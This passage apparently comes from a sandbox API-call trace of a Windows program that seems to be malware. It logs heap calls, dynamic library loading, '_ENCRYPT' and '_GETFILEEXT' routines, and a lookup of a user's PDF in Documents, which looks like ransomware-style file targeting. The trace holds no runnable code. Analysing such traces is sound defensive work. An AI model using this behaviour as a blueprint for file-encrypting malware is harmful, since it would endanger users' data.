lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0173.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0173.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0173.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0173.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0173.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0173.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.443] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0173.444] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9a8 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0173.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0173.445] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.445] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.445] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.446] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0173.446] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd9f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.446] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0173.446] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0173.446] CloseHandle (hObject=0x138) returned 1 [0173.446] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0173.447] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0173.447] FreeLibrary (hLibModule=0x75990000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0173.447] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0173.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0173.448] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0173.448] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0173.448] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0173.448] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0173.448] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0173.448] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0173.448] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0173.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0173.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0173.449] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0173.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0173.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0173.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.449] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.449] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0x90add8 [0173.450] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.451] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcaf22dc0, ftCreationTime.dwHighDateTime=0x1d5e632, ftLastAccessTime.dwLowDateTime=0x179d67e0, ftLastAccessTime.dwHighDateTime=0x1d5debb, ftLastWriteTime.dwLowDateTime=0x179d67e0, ftLastWriteTime.dwHighDateTime=0x1d5debb, nFileSizeHigh=0x0, nFileSizeLow=0xea9a, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="XjtJup63.pdf", cAlternateFileName="")) returned 0x90add8 [0173.451] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0173.451] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.451] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\XjtJup63.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0173.452] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS 